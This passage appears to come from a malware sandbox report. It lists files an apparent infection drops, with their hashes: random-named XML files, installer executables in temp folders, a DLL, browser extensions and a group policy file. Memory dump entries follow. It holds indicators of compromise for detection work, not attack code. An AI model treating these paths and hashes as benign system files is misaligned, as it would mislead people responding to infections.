                                                                                                          2KB

                                                                                                          MD5

                                                                                                          0c6be7471d49333f9e3434f941368544

                                                                                                          SHA1

                                                                                                          1ab439cce88bc19349c79f6258732fa1becd76ae

                                                                                                          SHA256

                                                                                                          726008cc3891ecfc551a7abe87fe3f2e53b70195e60ef1303099d80669b69f3f

                                                                                                          SHA512

                                                                                                          1740ba4520ca4abf5d3cc26c1f4a860a4da1a527cc9c156b0e3e25a5a05bf54b3c14cffb9b0a207e9959f68ea595d68d79295f44c8eaa93270547ef212b15b5d

                                                                                                        • C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR\eJXumPg.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          d408723139f8e817aa4606ea8240882d

                                                                                                          SHA1

                                                                                                          9f0501fb84341b82a7fd596975d9e2a9bfdf6b44

                                                                                                          SHA256

                                                                                                          80a5fddcb084c8aff7f89bb4c712b4df041d3a0c0bdae165c76dda569666aaf3

                                                                                                          SHA512

                                                                                                          e9468a3839f5749ed906a2bae60783d3678556ccadde8a708df8015202f8c422bc97f6cd6aa4cf827299f0cba933f32a4f7181e50f36d6aaf9fc1f3860520e94

                                                                                                        • C:\Program Files (x86)\fRaJVJSWwewU2\OsjbxXa.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          8ca2fa57de200b258cc8646470955951

                                                                                                          SHA1

                                                                                                          57ffa8bd0dc84d469a08e06ae19e074acfe03629

                                                                                                          SHA256

                                                                                                          5dd6253205b2fba64b84202aa2d6c4b7a03590dbe1e0e4004bba56902388bd1d

                                                                                                          SHA512

                                                                                                          9cb905a6decd68ff904abb62c5012656ca41387daee2da819ef25a00b7d223c8d465420350a2eab523e26277672e18ee3566c78953e263e0cd3698876d6744ce

                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                          Filesize

                                                                                                          2.0MB

                                                                                                          MD5

                                                                                                          548cf47e8b6c81271e4d9962cb80245a

                                                                                                          SHA1

                                                                                                          b9320e08efb493a80cecc982871205607adfd280

                                                                                                          SHA256

                                                                                                          f13c62007f9acebcb6213840824978fd90c5002b0d2e5eb4bead62a7958640b8

                                                                                                          SHA512

                                                                                                          45769526df9e10ce6e95a8d656a62dc5b9df362e0a15f90b3c4fee338881069b8e3e3ad1c58aef909416a6d3ea665a67bf4785dcc57a56a7232f889af9d452b4

                                                                                                        • C:\ProgramData\wTVsRuZmkGlUMZVB\bqLsGSs.xml

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          2532e2d1e6c06957cf30d3fe4e021198

                                                                                                          SHA1

                                                                                                          54626b16595da020cda8a3b1862884423b46bf19

                                                                                                          SHA256

                                                                                                          2f5d68cdcb394a9922f4fe7a29426ef9d226911ace1f0a96ee3275bc6427fe89

                                                                                                          SHA512

                                                                                                          209368233306f6fcf03d6ba71cd5b825922b648280316e96873ca2b60dc714b761acc8fbaca693324154935ea021e0b83ef656c96c81fa29978184b47a43cb52

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                          Filesize

                                                                                                          187B

                                                                                                          MD5

                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                          SHA1

                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                          SHA256

                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                          SHA512

                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                          Filesize

                                                                                                          136B

                                                                                                          MD5

                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                          SHA1

                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                          SHA256

                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                          SHA512

                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                          Filesize

                                                                                                          150B

                                                                                                          MD5

                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                          SHA1

                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                          SHA256

                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                          SHA512

                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                          Filesize

                                                                                                          10KB

                                                                                                          MD5

                                                                                                          881fa9fda273fc1a174409a92726adf3

                                                                                                          SHA1

                                                                                                          8531706564059967aa73aba4cc081b6213050c51

                                                                                                          SHA256

                                                                                                          165903af77964fedff547825bc648831a05d22626cdf8c8ec182a1b8dec932a8

                                                                                                          SHA512

                                                                                                          ef87c9c40fdd07343ec78ffd72bad5fc5fff3fa3db31ddb04c22aa49f89805e44d00e3d8a1b4c6664dc672ba36b1890dd110b6d13843a08653d5405dd0028861

                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                          Filesize

                                                                                                          26KB

                                                                                                          MD5

                                                                                                          f9d06485b43c46436e5ecf8816b3e2d3

                                                                                                          SHA1

                                                                                                          afe7b15c1315966c9a1bc893d06b507ba373a70b

                                                                                                          SHA256

                                                                                                          eceb12dbc41d7708115151509c4e0fd88d425ffa0c30738fa0ac46ba18c18aea

                                                                                                          SHA512

                                                                                                          bd0600f1c6d08cae2b4587c4b015525c5be27db40ba33071572899fb4ab27e6b2c034603682889c38b5420c3d0af6e227d3cc3477c3e6d907e54bc23ba177119

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          6bf0e5945fb9da68e1b03bdaed5f6f8d

                                                                                                          SHA1

                                                                                                          eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

                                                                                                          SHA256

                                                                                                          dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

                                                                                                          SHA512

                                                                                                          977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          f20fc92ad523c558973d6cee1113914f

                                                                                                          SHA1

                                                                                                          e1c86177ab874eaf3b3c9d3ffe407e0573ec2190

                                                                                                          SHA256

                                                                                                          e26d3f1cd2969ccbe046adc8dfa5df3d0c7000b2daf3593f20bdfe55a2951cd5

                                                                                                          SHA512

                                                                                                          4917eb3c88d67c714214d8bbfc615df6e88e65af75d7161fb9cdde0121a09787c93290257618a771727674e380a6a1e273b2559505d0052bf3d8304b228000bb

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSDDEC.tmp\Install.exe

                                                                                                          Filesize

                                                                                                          6.4MB

                                                                                                          MD5

                                                                                                          a70c1771e798b6c0cb1ad5d46232bf0a

                                                                                                          SHA1

                                                                                                          7dea8f0ca6614d1220f6ac5dbe7fb0aaeb28c940

                                                                                                          SHA256

                                                                                                          a6841daa03e2551b72f2429b2d21be11ed1955edea78be5af90b999fd297f483

                                                                                                          SHA512

                                                                                                          9b2009c3a29612c12f7a04af9a09bcbe0bcd92a1b422ea7480d3fcd10e18a27f2b367ce5fa84f3bb4c75491ca1edf295f08f4e9d0dfac1af98b7a66743b4a75a

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSE261.tmp\Install.exe

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                          MD5

                                                                                                          b6d0df0f684085e0dedc75a13d097ff9

                                                                                                          SHA1

                                                                                                          e2a22ebb265d25d122f994c1d8067c6346a48cb3

                                                                                                          SHA256

                                                                                                          2581331982d9d220323f43c2ab7d5c403b8d8747b84adace951abe2760e1fb3f

                                                                                                          SHA512

                                                                                                          c4ef41f9936418a6178040b4b76a077a9bcd70bd3f8f67048e9e5726d5e6ce4a790d0117c39278ed39d670dc9712fb74b77fc31e10ce7e5098b14b218369cbf4

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r42eea2a.4gm.ps1

                                                                                                          Filesize

                                                                                                          1B

                                                                                                          MD5

                                                                                                          c4ca4238a0b923820dcc509a6f75849b

                                                                                                          SHA1

                                                                                                          356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                          SHA256

                                                                                                          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                          SHA512

                                                                                                          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2b7acdhd.default-release\prefs.js

                                                                                                          Filesize

                                                                                                          7KB

                                                                                                          MD5

                                                                                                          3e2e828a0f1da5d697087e4a5c889d7f

                                                                                                          SHA1

                                                                                                          e3edbcf20d211f4a42b554345575d9fda3b40c64

                                                                                                          SHA256

                                                                                                          85067539f980c7c806586515c6bfea5c8be8ecd653cabf8c8bb3129d0485e15b

                                                                                                          SHA512

                                                                                                          71686a00c5c148022fdf1eca9289055437855318bdfbfb567cd957fffede1cbc49c7f8949c8b0095c3e95d179881a66a0bf3984a97cf67428b7256177e8ce160

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          c558fdaa3884f969f1ec904ae7bbd991

                                                                                                          SHA1

                                                                                                          b4f85d04f6bf061a17f52c264c065b786cfd33ff

                                                                                                          SHA256

                                                                                                          3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e

                                                                                                          SHA512

                                                                                                          6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          15KB

                                                                                                          MD5

                                                                                                          b01de0871a4177a44ef7e909f6c383b5

                                                                                                          SHA1

                                                                                                          e739d14d87208a291ed39f7562dc5df1967a6915

                                                                                                          SHA256

                                                                                                          2c19dc4267e31f75230f6d336f2274f364c23b8b927ae54677bd7d42acbec117

                                                                                                          SHA512

                                                                                                          cae51f4a1c6831790724d1603aa4b6c3752a21deba49fd38cbf66698228a0a1bc99ca9e39f5395bb002a07fb966f5c74950048fa3044f96236da0c5ffa824aa7

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          aec20535a2c5bcb2d8bffc176abcac05

                                                                                                          SHA1

                                                                                                          819be4cadf4c66399321cf9f86b6faf1d4721f86

                                                                                                          SHA256

                                                                                                          192c754884d46cfbfd27a196fac1fa146d7e51f0bf3fe01267e8e757a6f48003

                                                                                                          SHA512

                                                                                                          80ec50bae3e6c5045b65212e6f00049e25389b870e6ae0d8c8af3fa398ffecd51423833d787a25aac86778e52b28970871e536c0bce7b9707c8cd32b72c51511

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          12KB

                                                                                                          MD5

                                                                                                          da88111a63d0eb39c12944abbf7fb2cc

                                                                                                          SHA1

                                                                                                          03275f9d901de44bd28e2e3bc02e85db9dd01fdd

                                                                                                          SHA256

                                                                                                          e0a5d0ed9888c558f1a6874f79290b5c7c41c96f4fe469abf399cf3eee23db82

                                                                                                          SHA512

                                                                                                          9a0d6a93752b74ce2fffea6fbc6f5abc82f2feb1f1c73137a5556773c9115afe24ab052d06cd22df034a6afdb16f557cf951da865da1868eadaef3bcb1463692

                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Filesize

                                                                                                          15KB

                                                                                                          MD5

                                                                                                          ce2b4579778aac4798d29ef070e962bc

                                                                                                          SHA1

                                                                                                          32126d9099ed52577e6681819d1442589ae67275

                                                                                                          SHA256

                                                                                                          f0d9171a413e43c69aed6dca3186f3be339b574dac02c0bea0e9609e546b39da

                                                                                                          SHA512

                                                                                                          829d2a34b7b613f33591cae409220eb9cb1a7c1a9a76c36d575a44c550296d0439145296b2d245a37462aa94531af3a79f77ceb4cc40a3b5e0a370f4a49c768c

                                                                                                        • C:\Windows\Temp\yryKlDDJVLpCRzjJ\sQOwPkfy\TkuETda.dll

                                                                                                          Filesize

                                                                                                          6.4MB

                                                                                                          MD5

                                                                                                          8d16a2a3ae1fd8f75be7572060ed249b

                                                                                                          SHA1

                                                                                                          d07eaf58f3724f685033f0e53327bd9e4d2e4a82

                                                                                                          SHA256

                                                                                                          cd3031259051eccd160b5d2d427ce9ca9bc41ce3b1e85b043b2c8c63d12c499a

                                                                                                          SHA512

                                                                                                          a719ebc6b7e05dee9e2992f6dcee92c392125d6785327e1fa068d6de0ca8af8da632c00585ec2112144d1c2ba87226911c3c6459ccdd3e3865307db814c61e7b

                                                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                          Filesize

                                                                                                          5KB

                                                                                                          MD5

                                                                                                          7493968cf2c2c25c22e4787a17b3427a

                                                                                                          SHA1

                                                                                                          f26b8c7b941799adc78ff2f0a419b173929893d7

                                                                                                          SHA256

                                                                                                          c19a1b22f1bbf5f021ec7deec26ee9de3c3448fa85614528a93c88eee6714cf4

                                                                                                          SHA512

                                                                                                          7f364d0bc31dd44ad207b8117b879604408a0fef9373086b8da3a78da1d655952e4416c007713b2ad8dada010f65e9732aee1815445a1280b32bedee219c174b

                                                                                                        • memory/1644-46-0x0000000009940000-0x0000000009962000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/1644-18-0x00000000080B0000-0x0000000008116000-memory.dmp

                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/1644-15-0x0000000004DB0000-0x0000000004DE6000-memory.dmp

                                                                                                          Filesize

                                                                                                          216KB

                                                                                                        • memory/1644-16-0x00000000077D0000-0x0000000007DF8000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.2MB

                                                                                                        • memory/1644-17-0x0000000007E30000-0x0000000007E52000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/1644-19-0x0000000008120000-0x0000000008186000-memory.dmp

                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/1644-20-0x00000000081B0000-0x0000000008500000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/1644-21-0x0000000008090000-0x00000000080AC000-memory.dmp

                                                                                                          Filesize

                                                                                                          112KB

                                                                                                        • memory/1644-22-0x0000000008610000-0x000000000865B000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/1644-23-0x0000000008930000-0x00000000089A6000-memory.dmp

                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/1644-45-0x00000000096D0000-0x00000000096EA000-memory.dmp

                                                                                                          Filesize

                                                                                                          104KB

                                                                                                        • memory/1644-44-0x00000000099B0000-0x0000000009A44000-memory.dmp

                                                                                                          Filesize

                                                                                                          592KB

                                                                                                        • memory/1644-47-0x0000000009F50000-0x000000000A44E000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.0MB

                                                                                                        • memory/1684-453-0x0000000003630000-0x00000000036B7000-memory.dmp

                                                                                                          Filesize

                                                                                                          540KB

                                                                                                        • memory/1684-464-0x0000000003790000-0x000000000385D000-memory.dmp

                                                                                                          Filesize

                                                                                                          820KB

                                                                                                        • memory/1684-507-0x0000000000ED0000-0x000000000158A000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/1684-270-0x0000000002E60000-0x0000000002EC0000-memory.dmp

                                                                                                          Filesize

                                                                                                          384KB

                                                                                                        • memory/1684-173-0x0000000000ED0000-0x000000000158A000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/1684-213-0x00000000026B0000-0x0000000002735000-memory.dmp

                                                                                                          Filesize

                                                                                                          532KB

                                                                                                        • memory/1684-199-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.8MB

                                                                                                        • memory/3172-178-0x0000000006E00000-0x0000000006E4B000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/3172-176-0x00000000062E0000-0x0000000006630000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/3180-225-0x0000000006F80000-0x0000000006FCB000-memory.dmp

                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/3180-219-0x0000000006700000-0x0000000006A50000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/3348-489-0x0000000003E40000-0x0000000004411000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.8MB

                                                                                                        • memory/3560-70-0x0000000000890000-0x0000000000F4A000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/3560-36-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.8MB

                                                                                                        • memory/3560-12-0x0000000000890000-0x0000000000F4A000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/3632-99-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.8MB

                                                                                                        • memory/3632-172-0x0000000000890000-0x0000000000F4A000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.7MB

                                                                                                        • memory/4208-74-0x0000000006140000-0x0000000006490000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/4924-139-0x000001F7F10C0000-0x000001F7F10E2000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/4924-143-0x000001F7F1270000-0x000001F7F12E6000-memory.dmp

                                                                                                          Filesize

                                                                                                          472KB

                                                                                                        • memory/5080-97-0x0000000002B10000-0x0000000002C5A000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.3MB